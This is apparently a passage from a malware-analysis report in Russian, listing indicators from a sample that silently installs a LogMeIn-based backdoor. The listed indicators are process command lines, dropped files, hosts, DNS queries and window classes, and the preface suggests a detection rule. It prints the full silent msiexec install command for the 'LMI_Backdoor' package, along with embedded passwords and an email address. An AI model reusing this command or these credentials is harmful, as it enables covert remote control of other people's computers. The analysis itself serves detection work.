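Техническая информация
Ниже по порядку перечислены: командные строки запущенных процессов, пути к файлам, сетевые узлы с портами, запрошенные URL, DNS-запросы, а также классы и заголовки окон. Заголовки разделов в этой копии отсутствуют, поэтому по списку нельзя определить, какие файлы были созданы, а какие удалены (пути MSI2.tmp и MSI4.tmp указаны дважды). Символ «#» в именах узлов, по-видимому, скрывает часть имени (ср. «wp#d» и «wpad.dat»). Строка с msiexec /i … /quiet показывает установку MSI-пакета из %TEMP% без участия пользователя, с параметрами учётной записи в командной строке. Вместе с обращением к узлу logmein.com и окнами LogMeIn это, по-видимому, указывает на скрытое развёртывание средства удалённого доступа. Для обнаружения полезно отслеживать запуски msiexec.exe с ключом /quiet для пакетов из временных каталогов.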
- '%TEMP%\ejecutar.exe'
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' -Embedding AD2E897DDCCE4D57A4CFC0C1D047F5B2
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\ejecutar.bat" "
- '<SYSTEM32>\msiexec.exe' /i "%TEMP%\LMI_Backdoor_by_Lordblacksuca.msi" /quiet USERPASSWORD=0971111923 USERVERIFYPWD=0971111923 USEREMAIL=geomil_27@hotmail.com USERWEBPASSWORD=fucktop12 LicenseType=free
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\A8FABA189DB7D25FBA7CAC806625FD30
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\A8FABA189DB7D25FBA7CAC806625FD30
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5
- %WINDIR%\Installer\MSI2.tmp
- %WINDIR%\Installer\MSI5.tmp
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI3.tmp
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5
- %TEMP%\LMI_Backdoor_by_Lordblacksuca.msi
- %TEMP%\taskkill.exe
- %TEMP%\logmein-patch.exe
- %TEMP%\TARIFAS I WU.pdf
- %WINDIR%\Installer\2cb55.msi
- %TEMP%\1.tmp\ejecutar.bat
- %TEMP%\ejecutar.exe
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI2.tmp
- 'cs######4-crl.verisign.com':80
- 'se####.logmein.com':443
- 'wp#d':80
- 'crl.verisign.com':80
- cs######4-crl.verisign.com/CSC3-2004.crl
- crl.verisign.com/pca3.crl
- wp#d/wpad.dat
- DNS ASK cs######4-crl.verisign.com
- DNS ASK se####.logmein.com
- DNS ASK wp#d
- DNS ASK crl.verisign.com
- ClassName: 'LogMeInGui' WindowName: 'LogMeInGui'
- ClassName: 'LogMeInToolkit' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'